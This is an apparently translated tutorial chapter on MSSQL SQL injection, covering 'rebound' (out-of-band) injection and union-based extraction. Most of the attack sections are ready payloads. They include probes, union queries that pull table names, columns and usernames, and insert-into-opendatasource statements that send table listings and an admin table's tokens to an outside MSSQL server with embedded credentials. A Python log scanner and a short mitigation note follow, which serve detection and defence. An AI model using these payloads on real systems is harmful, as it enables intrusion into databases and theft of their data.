Cybersecurity from entry to mastery (Chapter 5-3) MSSQL rebound injection

In this article:

  • MSSQL rebound injection usage scenarios
  • MSSQL rebound injection statement parsing
  • MSSQL rebound injection specific process
  • MSSQL error injection specific process


1. MSSQL rebound injection usage scenario:

  1. Introduction:

    MSSQL injection is the most complex form of database injection attack. Because the database engine is very powerful, its stored procedures and function statements are very rich, and these flexible statements have long given rise to novel and unusual attack ideas.

  2. MSSQL rebound injection:

    A parameter is clearly an injection point, yet it cannot be exploited; the injection tool's blind guessing is extremely slow; error messages are turned off, so the injection result cannot be returned. These are problems often encountered in injection attacks.

    To get around these stubborn problems, a better solution is rebound injection, and rebound injection relies on the support of the opendatasource function.

  3. Rebound injection is limited to the MSSQL database.

  4. Rebound injection actually sends the queried data to our own MSSQL server, so we need our own MSSQL database with a public IP.

2. Analysis of MSSQL rebound injection statement:

  1. Union query as an example:

    First, guess the number of fields.

    For a union query, write union all.

    To find the output point, fill the columns with null.

    The comment is only -- (don't think about #).

  2. MSSQL statements:

    dbo.sysdatabases: query the system databases.

    sysobjects where xtype = 'u': query the tables via the sysobjects system table (xtype = 'u' selects user tables).

    syscolumns where id = 'the id value of the corresponding table in sysobjects': query the field names.

  3. Function:

    opendatasource can be understood as a function that sends the results of a query on the current database to another database server.

    Syntax: opendatasource(provider_name, init_string).

      provider_name: the registered PROGID name of the OLE DB provider used to access the data source; for MSSQL the name is SQLOLEDB.

      init_string:

        The connection string.

        It contains the link address and port, user name, password and database name:

        server = link address,port; uid = user name; pwd = password; database = database name

    Example:

      insert into opendatasource('sqloledb','server=; uid=; pwd=; database=').database_name.dbo.table_name select * from admin --

3. MSSQL rebound injection specific process:

  Example: SELECT * FROM NEWS WHERE id='1'

    1. Determine whether there is SQL injection:

      ' and 1=1 -- qwe versus ' and 1=2 -- qwe

    2. Query table name:

      '; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select id,name from sysobjects where xtype='u' --

    3. Query field name:

      '; insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select id,name from syscolumns where id=1977058079 --

    4. Query data:

      ';insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14D6922_aa_admin;pwd=12345678;database=DB_14D6922_aa').DB_14D6922_aa.dbo.t select null,token from admin --
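The distributed-query call in the payloads above carries the receiving server inside its connection string, so a defender can scan the web access log for it and pull that host out as an indicator. This is an added detection example, not code from the original post; the log lines, the placeholder host attacker-db.example.net and the function names are constructed for it.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access log lines (not from the original post); the
# second carries an OPENDATASOURCE payload pointing at a placeholder host.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Apr/2020:12:00:01 +0000] "GET /news.asp?id=1 HTTP/1.1" 200 2311',
    '10.0.0.9 - - [10/Apr/2020:12:00:07 +0000] "GET /news.asp?id=1%27%3B+insert+into+'
    'opendatasource(%27sqloledb%27,%27server%3Dattacker-db.example.net,1433%3Buid%3Dx'
    '%3Bpwd%3Dy%3Bdatabase%3Dz%27).z.dbo.t+select+id,name+from+sysobjects+where+'
    'xtype%3D%27u%27+-- HTTP/1.1" 500 512',
    '10.0.0.9 - - [10/Apr/2020:12:00:09 +0000] "GET /news.asp?id=1%27+order+by+3+--+qwe HTTP/1.1" 200 2311',
]

# Ad hoc distributed-query functions whose argument list holds a connection string.
OOB_FUNCS = re.compile(r"\b(opendatasource|openrowset)\s*\(", re.IGNORECASE)
# server=host,port inside that connection string: the server that receives the data.
SERVER_KV = re.compile(r"server\s*=\s*([^;'\"\s]+)", re.IGNORECASE)


def normalise(raw: str) -> str:
    """URL-decode the request line and collapse whitespace so the regexes see plain SQL."""
    return " ".join(unquote_plus(raw).split())


def scan(line: str):
    """Return {'function', 'server'} if the line carries a distributed-query call, else None."""
    text = normalise(line)
    match = OOB_FUNCS.search(text)
    if match is None:
        return None
    finding = {"function": match.group(1).lower(), "server": None}
    # Look for the connection string only after the function call so an unrelated
    # "server=" elsewhere in the request is not reported as the destination.
    srv = SERVER_KV.search(text, match.end())
    if srv:
        finding["server"] = srv.group(1)
    return finding


def scan_log(lines):
    """(line number, finding) for every line that should raise an alert."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := scan(line)) is not None]


if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {f['function']} call sending data to {f['server']}")
```

OPENDATASOURCE with an inline connection string only works when the server's 'Ad Hoc Distributed Queries' option is enabled, so leaving that option off, together with parameterised queries in the application, is what closes this path.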

4. MSSQL error injection specific process:

  Example: SELECT * FROM NEWS WHERE id='1'

    1. Determine whether there is SQL injection:

      ' and 1=1 -- qwe versus ' and 1=2 -- qwe

    2. Determine the number of page fields:

      ' order by 1 ... -- qwe

    3. View the output point:

      ' union all select null,null,null from admin -- qwe

    4. Query table name:

      ' union all select id,name,null from sysobjects where xtype='u' --qwe

    5. Query field name:

      ' union all select null,name,null from syscolumns where id=1977058079 -- qwe

    6. Query data:

      ' union all select null,username,null from admin -- qwe


Source: www.cnblogs.com/xz25/p/12670392.html